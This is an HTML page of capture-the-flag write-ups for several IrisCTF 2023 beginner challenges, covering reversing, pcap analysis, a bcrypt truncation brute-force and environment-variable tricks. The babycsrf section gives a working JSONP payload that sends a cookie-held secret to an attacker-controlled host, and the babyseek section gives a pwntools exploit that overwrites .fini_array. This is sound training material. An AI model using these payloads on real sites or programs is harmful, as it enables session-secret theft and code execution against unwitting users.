<nav>
	<a href="@pathto(/writeups/)">./..</a>
</nav>

<pre id="header">
 ___     _     ___ _____ ___   ___ __ ___ ____
|_ _|_ _(_)___/ __|_   _| __| |_  )  \_  )__ /
 | || '_| (_-< (__  | | | _|   / / () / / |_ \
|___|_| |_/__/\___| |_| |_|   /___\__/___|___/</pre>

<div class="container">
	<a href="./">./</a>
	<ul>
		<li><a href="#babybabyrev">#babybabyrev</a></li>
		<li><a href="#babycsrf">#babycsrf</a></li>
		<li><a href="#babyforens">#babyforens</a></li>
		<li><a href="#babyseek">#babyseek</a></li>
		<li><a href="#babyshark">#babyshark</a></li>
		<li><a href="#babystrechy">#babystrechy</a></li>
		<li><a href="#hostissues">#hostissues</a></li>
<!--
		<li><a href="#meaningofpython">#meaningofpython</a></li>
		<li><a href="#meaningofpython2">#meaningofpython2</a></li>
		<li><a href="#needleinthehaystacksecure">#needleinthehaystacksecure</a></li>
		<li><a href="#ret2libm">#ret2libm</a></li>
		<li><a href="#socat">#socat</a></li>
		<li><a href="#withefi">#withefi</a></li>
-->
	</ul>
</div>

<div class="container challenge" id="babybabyrev">
	<b><a href="#babybabyrev">#babybabyrev</a> (by: nope)</b><br/>
	<strong>[Reverse Engineering]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=4">
		<p><i>I needed to edit some documents for my homework but I don't want to buy a license to this software! Help me out pls?</i></p>
	</blockquote>

	<p>We are given a binary <code>baby_baby_rev</code>. Running it gives us a promt to put a "registration code". We need to figure out which code to put to bypass this prompt.</p>

	<p>When inspecting the disassembled binary, the first conditional jump we find compares the result of a call to <code>strlen</code> (<code>rax</code>) with <var>0x20</var>. This gives us the first hint: the code is 32 characters long.</p>

	<p>Then we can see that, for every character in the input code, the program subtracts a value and adds the index of that character to the result. In the example below (disassembled using Radare2) we can see that it subtracts <var>0x72</var> from the second character in the input, then adds <var>1</var> (its index):</p>

<pre class="codeblock">
movzx eax, byte [var_6fh]   ; Load character from user input
mov edx, eax
mov eax, 0x72
sub edx, eax                ; Subtracts value from user input
mov eax, edx
add eax, 1                  ; Adds 1 to the result of the subtraction
mov byte [var_6fh], al      ; Moves the result back to the buffer
</pre>

	<p>Taking a better look at that value being subtracted, it looks like a character. The one from the example is an <var>'r'</var>. Converting all values to character leaves us with the string <var>"irisctf{microsoft_word_at_home:}"</var>. The flag.</p>

	<p>For the sake of completion, I'll analyze the rest of the program :).</p>

	<p>It then goes on a loop whose condition is to be less than or equals to <val>0x1f</val> (it loops through the characters). Inside of the loop it loads the character at said index, then compares it to this index. If it is different, then it prints out an error message and exits:</p>

<pre class="codeblock">
mov eax, dword [var_74h]
cdqe
movzx eax, byte [rbp + rax - 0x70]   ; Loads value from buffer
movsx eax, al
cmp dword [var_74h], eax             ; Compares current index with value
je 0x1594                            ; Continues the loop if successful
lea rdi, str.Invalid_code_
call sym.imp.puts                    ; puts("Invalid code!")
mov eax, 1
jmp 0x15bb                           ; Exits loop
add dword [var_74h], 1               ; Increments iterator
cmp dword [var_74h], 0x1f            ; Beginning of loop
jle 0x156f
</pre>

	<p>If it is successful running through the whole loop, it prints a success message and calls <code>abort()</code>.</p>
</div>

<div class="container challenge" id="babycsrf">
	<b><a href="#babycsrf">#babycsrf</a> (by: sera)</b><br/>
	<strong>[Web Exploitation]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=6">
		<p><i>JSONP is a old pattern for getting data into JS, but I heard it's insecure because an attacker can specify code instead of a function name. I solved this problem by not letting you change the name.</i></p>

		<p><i>For this challenge you will need to submit a URL to the admin bot (a program that runs a browser and directs it to visit your URL, simulating a real person clicking your link). I recommend learning how to use <a href="https://ngrok.com/" target="_blank">ngrok</a> if you don't know how to expose local solutions to the internet - I've also provided a template server using Python and Flask for your solution.</i></p>
	</blockquote>

	<p>When accessed, the website shows us an example flag. We can see that, to get that flag, the website loads a script from <var>"/api"</var> on the <code>window.onload</code> event. This script gets the flag from a cookie called <var>secret</var>. It then generates a call to <code>setMessage</code> with the flag. The <code>setMessage</code> handler then exhibits the flag on the website by replacing the <code>innerText</code> from the element with id <code>"message"</code> with the flag.</p>

	<p>We are also given an endpoint from which we can ask a bot to access an arbitrary link. Another great piece of advice that was given to us is that the cookie <var>secret</var> has the attribute <var>SameSite</var> set to <var>None</var>, this allows the cookie to be sent to calls from first-party and third-party websites alike.</p>

	<p>With these pieces of information, we can begin to craft our exploit. We want the bot to access our website and, when it does, send us the flag.</p>

	<p>We can create a webpage that imports the <var>"/api"</var> script, but instead of the <code>setMessage</code> handler replacing an element's <code>innerText</code>, it sends us the flag through an http request:</p>

<pre class="codeblock">
&lt;script&gt;
	window.setMessage = (m) => {
		// Here we use a different page to make the redirect so
		// that the bot doesn't get stuck in a redirection loop
		document.location = "https://yourhost.com/asdf?flag=" + m;
	}
	window.onload = () => {
	    s = document.createElement("script");
	    s.src = "https://babycsrf-web.chal.irisc.tf/api";
	    document.body.appendChild(s);
	}
&lt;/script&gt;
</pre>

	<p>Save this as <var>index.html</var>, start an http server (<code>python3 -m http.server</code>), and expose the server to the internet (<code>ngrok http 8000</code>). Have the bot access your website and you will have your flag through the http server's logs, like in the example below:</p>

<pre class="codeblock">
"GET /asdf?flag=irisctf{jsonp_is_never_the_answer} HTTP/1.1" 404
</pre>
</div>

<div class="container challenge" id="babyseek">
	<b><a href="#babyseek">#babyseek</a> (by: sera)</b><br/>
	<strong>[Binary Exploitation]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=10">
		<p><i>I'll let you seek around my file as far as you want, but you can't go anywhere since it's /dev/null.</i></p>

		<p><i>To figure out where things are, you can use the <code>gdb</code> debugger. I recommend using a Docker instance, such as with the Dockerfile provided, to ensure you have an environment that matches the remote server you are attacking.</i></p>
	</blockquote>

	<p>The program prints out two addresses: an address to <code>win</code> (the function we need to call to get the flag), and a pointer to an open file's <code>_IO_write_ptr</code>. It then lets you add a value to the <code>_IO_write_ptr</code> before calling <code>fwrite</code> on the file, writing the address to <code>win</code>.</p>

	<p>Reading a little about <code>_IO_write_ptr</code> reveals that this variable is responsible for storing the current write address, meaning it will begin writing to this address the next time an <code>fwrite</code> is called.</p>

	<p>We then just need to figure out where to write our <code>win</code> function so that it executes. For this there are two options: write to <var>.got.plt</var> to overwrite the address of any other function dynamically linked to the program, or write to <var>.fini_array</var> to execute the function at the object's termination process.</p>

	<p>To figure the exact address to write, you need to execute the binary and get both addresses. <code>win</code>'s address will allow you to get the absolute address of either the desired entry in <var>.got.plt</var> or the address of <var>.fini_array</var>. <code>_IO_write_ptr</code>'s address allows you to calculate the offset to the desired writing address.</p>

	<p>A simple solver in python using pwntools looks like this:</p>

<pre class="codeblock">
from pwn import *

bin = ELF("./chal")
p = process(bin.path) # or remote("seek.chal.irisc.tf", 10004)

p.readuntil(b"0x")
winaddr = int(p.readuntil(b".", True), 16)
p.readuntil(b"0x")
iowaddr = int(p.readuntil(b".", True), 16)

bin.address = winaddr - bin.symbols["win"]

finiarr = bin.address + bin.get_section_by_name('.fini_array').header.sh_addr

p.sendlineafter(b"? ", b"%d"%(finiarr - iowaddr))
p.stream()
</pre>
</div>

<div class="container challenge" id="babyshark">
	<b><a href="#babyshark">#babyshark</a> (by: skat)</b><br/>
	<strong>[Networks]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=22">
		<p><i>I was going to call this challenge babynet, but I have that baby shark song stuck in my head... doo doo, doo doo doo baby shark...</i></p>
	</blockquote>

	<p>The challenge provides us with a <em>.pcapng</em> file. In tshark we can see a few DHCP, ARP, and HTTP packets. Let's filter for HTTP only with <code>tshark -r capture.pcapng -Y 'http'</code>:</p>

<pre class="codeblock">
113 408.427255072 192.168.56.170 → 192.168.56.169 HTTP 411 GET / HTTP/1.1
116 408.429557546 192.168.56.169 → 192.168.56.170 HTTP 416 HTTP/1.0 200 OK  (text/html)
123 408.909355109 192.168.56.170 → 192.168.56.169 HTTP 370 GET /favicon.ico HTTP/1.1
126 408.920334280 192.168.56.169 → 192.168.56.170 HTTP 537 HTTP/1.0 404 File not found  (text/html)
133 411.445678672 192.168.56.170 → 192.168.56.169 HTTP 462 GET /babyshark.gif HTTP/1.1
307 411.478026817 192.168.56.169 → 192.168.56.170 HTTP 24250 HTTP/1.0 200 OK  (image/gif)
</pre>

	<p>There we can see a request to the home page, a request to favicon.ico, and a request to <var>babyshark.gif</var>. Let's extract both the home page and <code>babyshark.gif</code> to analyze them. <code>tshark -r capture.pcapng --export-objects http,./</code>.</p>

	<p>Taking a look at <code>babyshark.gif</code> we get the flag <code>irisctf{welc0m3_t0_n3tw0rks}</code>.</p>
</div>

<div class="container challenge" id="babystrechy">
	<b><a href="#babystrechy">#babystrechy</a> (by: sera)</b><br/>
	<strong>[Web Exploitation]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=8">
		<p><i>More byte mean more secure</i></p>

		<p><i>Although this is a web challenge, the script is ran directly with PHP because it doesn't need to have an HTML website attached. Run the command below to connect!</i></p>
	</blockquote>

	<p>Reading the php code we see that we have to guess a 64 byte password randomly generated using <code>openssl rand</code>. The password is stretched (for every character, repeat said character 64 times) so that the final length of the password is <var>64*64 = 4096</var> bytes. The stretched password is then hashed using PHP's <code>password_hash</code>.</p>

	<p>We then enter a loop where we can input as many passwords as we want. Our password is verified against the hashed password (meaning we also have to stretch our password).</p>

	Reading a little about password_hash something interesting pops up:

	<blockquote cite="https://www.php.net/manual/en/function.password-hash.php#refsect1-function.password-hash-parameters">
		<p><i><b>Caution</b></i></p>

		<p><i>Using the <b>PASSWORD_BCRYPT</b> as the algorithm, will result in the password parameter being truncated to a maximum length of 72 bytes.</i></p>
	</blockquote>

	<p>So the password they stretched 64 times per character got trimmed to only 72 characters, leaving us with two bytes (64 times the first character, plus 8 times the second) to brute-force.</p>

	<p>After adding <code>#!/bin/php</code> to the beginning of the file and giving it execute permission, I got it to work locally. This program then did the trick of cracking the password:</p>

<pre class="codeblock">
from pwn import *

p = process("./chal.php")

try:
	p.readuntil(b"> ")
	for i in range(0x100):
		password = ''.join([x*64 for x in "%x"%i])
		p.sendline(password.encode())
		log.info(f"Got this: {p.recv(timeout=0.5)}")
except EOFError: pass
</pre>
</div>

<div class="container challenge" id="hostissues">
	<b><a href="#hostissues">#hostissues</a> (by: sera)</b><br/>
	<strong>[Miscellaneous]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=5">
		<p><i>The flag's right there, but I think it's kinda stuck. Please help me.</i></p>
	</blockquote>

	<p>The challenge gives us three files: the <code>chal.py</code> which we will be interacting with, the <code>chal_server.py</code> that serves as an internal web server for queries on data, and <code>chal.sh</code> that launches both.</p>

	<p>On <code>chal.py</code> we see that the user is in a loop sending input. For every input there are two possible actions: either he reads an environment variable or he writes an environment variable.</p>

	<p>On both ocasions, after the input and before anything else the program tries to checks for and print data about the flag, but the problem is that the host that is hard-coded (<code>flag_domain</code>) is not the host you actually want to access. You'd probably want to access <code>127.0.0.1</code> since the web server and the client you are interacting with are running on the same machine.</p>

	<p>Having a look at the <code>check()</code> function we can see that it actually calls <code>curl -s &lt;link&gt;</code>. We now have to take a look at what environment variables we could use to interfere with the name resolution so as to successfully check the local web server.</p>

	<p>Out of all possible environment variables, those that change proxies look the most promising. Time to change any of <code>http_proxy</code> or <code>ALL_PROXY</code> to point to <var>127.0.0.1</var> and hope for the best:</p>

<pre class="codeblock">
&gt; 1
Name? http_proxy
Value? http://127.0.0.1:25566
&gt; 2
{'flag': 'irisctf{very_helpful_error_message}\n'}
Name?
</pre>

	<p>I also tried with <var>localhost</var>. It worked on my machine, but failed. My guess is that the container somehow can't resolve <var>localhost</var>.</p>

	<p>I later found out that this was not the intended way. The intended way was to set <var>RESOLV_HOST_CONF</var> to ./<var>flag</var> to cause an error and, when the error message is printed it shows the file content (it being the flag):</p>

<pre class="codeblock">
&gt; 1
Name? RESOLV_HOST_CONF
Value? ./flag
&gt; 2
./flag: line 1: bad command `irisctf{very_helpful_error_message}'
Name?
</pre>

	<p>And now the flag makes much more sense...</p>
</div>

<!--
<div class="container challenge" id="meaningofpython">
	<b><a href="#meaningofpython">#meaningofpython</a> (by: nope)</b><br/>
	<strong>[Reverse Engineering]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=47">
		<p><i>Python. Python! What <em>is</em> Python? Is <em>this</em> Python? Why does this Python look so strange? All this and more on <em>in... the... textfield...</em></i></p>
	</blockquote>

	<p>We receive a python script <var>./python1.py</var>. On the main function we can see the flow of the python program. It expects a flag through argv of length at least 44 characters. It then scrambles the flag once, compresses it using zlib, check it's length again and expects a length of at least 52, then scrambles again.</p>

<pre class="codeblock">
flag_to_check = sys.argv[1]

if len(flag_to_check) < 44:
    exit(1)

scramble1(flag_to_check)

flag_compressed = zlib.compress(flag_to_check.encode("utf-8"))

if len(flag_compressed) < 52:
    exit(1)

scramble2(flag_compressed)
</pre>

<p>After this flow, it compares the resulting string against this hard-coded string: <code>x\x9c\xcb,\xca,N.I\xab.\xc9\xc8,\x8e7,\x8eOIM3\xcc3,1\xce\xa9</code> <code>\x8c7\x89/\xa8,\xc90\xc8\x8bO\xcc)2L\xcf(\xa9\x05\x00\x83\x0c\x10\xf9</code>.</p>

	<p>The functions <code>scramble1()</code> and <code>scramble2()</code> have a series of calls to four smaller functions. These functions operate on two different indexes of the flag.</p>

	<p><b>WIP</b></p>
</div>

<div class="container challenge" id="meaningofpython2">
	<b><a href="#meaningofpython2">#meaningofpython2</a> (by: nope)</b><br/>
	<strong>[Reverse Engineering]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=48">
		<p><i>There's this cool new Python obfuscator that came out recently that obfuscates Python. I made some changes to part 1 and obfuscated it. Now how will you get the flag?</i></p>

		<p><i>Originally depends on: Meaning of Python 1</i></p>
	</blockquote>

	<p><b>WIP</b></p>
</div>

<div class="container challenge" id="needleinthehaystacksecure">
	<b><a href="#needleinthehaystacksecure">#needleinthehaystacksecure</a> (by: skat)</b><br/>
	<strong>[Networks]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=40">
		<p><i>I saw my arch-nemesis, Billy Bob Bobertson, in the library. He left his laptop open for 3 minutes to go use the restroom. Luckily, I had my BadUSB handy and gave myself a shell and then persistent remote access, and started running a few commands and capturing his web traffic (shown in the attached screenshot). I think he's up to something suspicious and received some sort of message from a group of criminals.</i></p>

		<p><i>They say that looking through a pcap is like finding a needle in a haystack, but what do you do if that haystack is encrypted?</i></p>
	</blockquote>

	<p><b>WIP</b></p>
</div>

<div class="container challenge" id="ret2libm">
	<b><a href="#ret2libm">#ret2libm</a> (by: sera)</b><br/>
	<strong>[Binary Exploitation]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=34">
		<p><i>I need to make a pwn? Let's go with that standard warmup rop thing... what was it... ret2libm?</i></p>
	</blockquote>

	<p><b>WIP</b></p>
</div>

<div class="container challenge" id="socat">
	<b><a href="#socat">#socat</a> (by: sera)</b><br/>
	<strong>[Binary Exploitation]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=16">
		<p><i>I love sockets and cats and socat and <code>ls</code></i></p>

		<p><i>Socat version on remote is 1.7.4.1</i></p>
	</blockquote>

	<p><b>WIP</b></p>
</div>

<div class="container challenge" id="withefi">
	<b><a href="#withefi">#withefi</a> (by: skat)</b><br/>
	<strong>[Networks]</strong>

	<blockquote cite="https://2023.irisc.tf/challenge?id=37">
		<p><i>You're probably used to pcaps captured at layer 3 in promiscuous mode, but do you know what to do with a pcap captured at layer 2 in monitor mode?</i></p>
	</blockquote>

	<p><b>WIP</b></p>
</div>
-->
